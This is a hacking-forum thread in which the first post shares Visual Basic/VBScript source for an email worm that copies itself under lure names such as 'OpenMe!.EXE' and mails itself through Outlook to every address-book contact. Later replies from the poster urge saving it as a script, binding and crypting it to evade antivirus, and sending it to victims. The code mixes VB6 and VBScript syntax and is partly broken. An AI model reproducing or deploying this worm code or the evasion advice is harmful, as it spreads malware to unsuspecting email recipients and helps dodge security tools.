Login Register


Worm filter_list
Author
Message
Worm #1
It's not a virus but it's a worm,it's gonna copy itself to other computers via e-mail
A worm will do some following things
-E-mail
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits

Av's detect: "HEUR/Outlook worm"

Code:
Private Form Sub_Load() Me.hide Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe" Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe" Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE" Filecopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE" Set so = CreateObject(fso) Set ol = CreateObject("Outlook.Application") Set out = Wscript.CreateObject("Outlook.Application") Set mapi = out.GetNameSpace("MAPI") Set a = mapi.AddressLists(1) For X = 1 To a.AddressEntries.Count Set Mail = ol.CreateItem(0) Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X) Mail.Subject = "Fwd:None" Mail.Body = "Hey Buddy My first worm is in your email now, enjoy it !!!"&"Have a nice worm !!" Mail.Attachments.Add = "C:\Worm1.exe" Mail.Send Next ol.Quit End Sub

This code is for visual basic 6!I'm try in visual basic 2008 errors!

I'm try to make this worm in notepad!And AV's detect:HEUR/Worm.Outlook.VBS Save as: .vbs (visual basic script) I'll send to victim! Biggrin I want to test! :thumbs:

Virus scan!

Good luck! Biggrin
Enjoy! :thumbs:

Reply

RE: Worm #2
Interesting, thanks for the share!

Reply

RE: Worm #3
cute Smile thanks for the share!!!
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Worm #4
Nice .., gotta look.. Biggrin
[Image: Wfxdx.png]

Reply

RE: Worm #5
This thread is getting detected by NOD32 (and probably some other AVs) as a possible worm, just because FSO is also used in VBscripts.
For the paranoid people: this thread is perfectly safe. Smile
[Image: rytwG00.png]
Redcat Revolution!

Reply

RE: Worm #6
(06-22-2011, 10:59 AM)Coder-san Wrote: This thread is getting detected by NOD32 (and probably some other AVs) as a possible worm, just because FSO is also used in VBscripts.
For the paranoid people: this thread is perfectly safe. Smile

Yeah is detect by: NOD 32 and Avira AntiVir and other Av's.My av's detect outlook worm because it's send file on outlook Smile I'm try to make worm in visual basic 2008-> ERRORS.You're right!This is safe.But if this is used in VBscripts then you can make a VBS(Visual Basic script) in Notepad??Then send to victim? Biggrin I'll try it! Open notepad copy this code into notepad then save as: whatever.vbs U must bind it then send to victim!(AV's detect a worm) U must crypt it! Tongue Good luck! :thumbs:

Reply

RE: Worm #7
ncie work have a look at itzaworm 4.4 (i think that how you spell it) it has a few more features and is in vb.net 2010 Smile
thanks mate

Reply

RE: Worm #8
(06-22-2011, 03:51 PM)nickjonnes Wrote: ncie work have a look at itzaworm 4.4 (i think that how you spell it) it has a few more features and is in vb.net 2010 Smile
thanks mate

cool Biggrin You're welcome! :thumbs:

Reply

RE: Worm #9
thanks for sharing.... Smile

Reply

RE: Worm #10
(06-22-2011, 08:43 PM)WoosTy Wrote: thanks for sharing.... Smile

You're welcome... Smile

Reply







Users browsing this thread: 1 Guest(s)